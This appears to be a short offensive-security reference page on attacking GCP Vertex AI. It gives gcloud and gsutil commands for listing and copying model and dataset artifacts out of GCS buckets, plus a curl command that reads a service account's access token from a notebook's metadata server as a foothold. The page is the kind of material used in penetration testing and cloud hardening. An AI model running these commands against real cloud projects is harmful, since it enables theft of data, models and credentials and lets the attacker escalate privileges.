Vertex AI is GCP's managed ML platform, and it is attacked two ways: for the data and models it holds (training datasets, tuned model artifacts in GCS), and as compute that runs under a service account. A managed notebook or a custom training job runs as an attached service account, so creating one is a deploy-as-service-account path, and the notebook's metadata server hands out that account's token.
Model and dataset theft#
gcloud ai models list --region <region>
gcloud ai models upload --help # (inverse: export/download artifacts from the model's GCS URI)
gsutil -m cp -r gs://<model-bucket>/ . # pull the artifacts the model points at
gcloud ai datasets list --region <region>
Notebook as a service-account foothold#
# a notebook runs as --service-account; from inside it, read the token
curl -s -H 'Metadata-Flavor: Google' \
'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'
Exploitation notes#
- Creating a notebook or training job with a privileged
--service-accountis the privesc angle and is covered as actAs: Vertex AI notebook; this page is the data and model theft. - Model artifacts and training data live in GCS buckets; the Vertex objects point at them, so bucket access often shortcuts the whole service.
Tools#
- gcloud (
ai models,ai custom-jobs,notebooks instances). - gsutil: pull model and dataset artifacts from GCS.